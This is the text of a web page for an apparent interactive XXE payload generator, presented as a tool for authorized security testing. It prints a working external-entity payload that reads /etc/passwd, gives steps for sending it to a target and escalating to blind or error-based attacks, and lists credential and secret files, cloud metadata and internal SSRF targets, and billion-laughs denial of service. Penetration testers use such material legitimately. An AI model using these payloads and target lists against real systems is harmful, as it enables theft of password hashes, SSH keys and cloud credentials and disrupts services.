XXE Payload Generator

Interactive tool for generating custom XXE test payloads for authorized security testing

⚠️ Warning: Only use these payloads in authorized security testing environments. Unauthorized testing is illegal and unethical.

Payload Type

File Disclosure

Read local files

Blind XXE

Out-of-band exfiltration

SSRF

Server-side request forgery

Parameter Entity

Advanced blind XXE

Error-Based

Trigger error messages

Billion Laughs

Denial of service

Target Platform

Linux / UnixWindows

Configuration

Target File

Protocol

Entity Name

Encoding

Generated Payload

XMLxxe-file-disclosure-linux.xml⚠️ Vulnerable
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

Usage Instructions:

Send this XML to the target application endpoint
Check the response for file contents
If no output, try error-based or blind XXE techniques

Quick Reference

Common Linux Targets

/etc/passwd - User accounts
/etc/shadow - Password hashes
/proc/self/environ - Environment vars
~/.ssh/id_rsa - SSH keys

Common Windows Targets

C:/Windows/win.ini - Windows config
C:/boot.ini - Boot config
C:/inetpub/wwwroot/web.config - IIS

SSRF Targets

http://localhost:8080 - Local services
http://169.254.169.254 - Cloud metadata
http://192.168.1.1 - Internal network

Testing Resources

OOB Detection Services

• Burp Collaborator (Burp Suite Pro)
• Interactsh (Free)